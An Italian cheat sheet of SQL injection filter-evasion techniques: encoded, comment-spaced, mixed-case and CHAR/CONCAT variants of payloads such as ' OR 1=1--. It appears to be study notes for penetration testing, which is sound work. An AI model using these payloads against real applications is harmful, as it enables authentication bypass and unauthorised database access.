Tecniche Evasive

---

tags : SQL_Evasion

---

URL Encoding

 
' OR 1=1--
 
#Diventa
 
%27%20OR%201%3D1--
 

Hexadecimal Encoding

 
SELECT * FROM users WHERE name = 'admin'
 
# Diventa
 
SELECT * FROM users WHERE name = 0x61646d696e
 

Unicode Encoding

 
admin
 
#Diventa
 
\u0061\u0064\u006d\u0069\u006e
 

No Spaces Allowed

 
SELECT * FROM users WHERE name = 'admin'
 
#Diventa
 
SELECT/**/*FROM/**/users/**/WHERE/**/name/**/='admin'
 
1' OR 1=1 --
 
#Diventa
 
1'%0A||%0A1=1%0A--%27+
 

Altri tipi di spazio possono essere %09, %0A, %0C, %0D, %A0.

Payload misti

 
SElEcT * FrOm users or SE/**/LECT * FROM/**/users
 
SELECT%0A*%0AFROM%0Ausers or SELECT/**/*/**/FROM/**/users
 
username = 'admin' && password = 'password' or username = 'admin'/**/||/**/1=1 --
 
SElEcT * FROM users WHERE username = CHAR(0x61,0x64,0x6D,0x69,0x6E)
 
SElECT * FROM users WHERE username = CONCAT('a','d','m','i','n') or SElEcT/**/username/**/FROM/**/users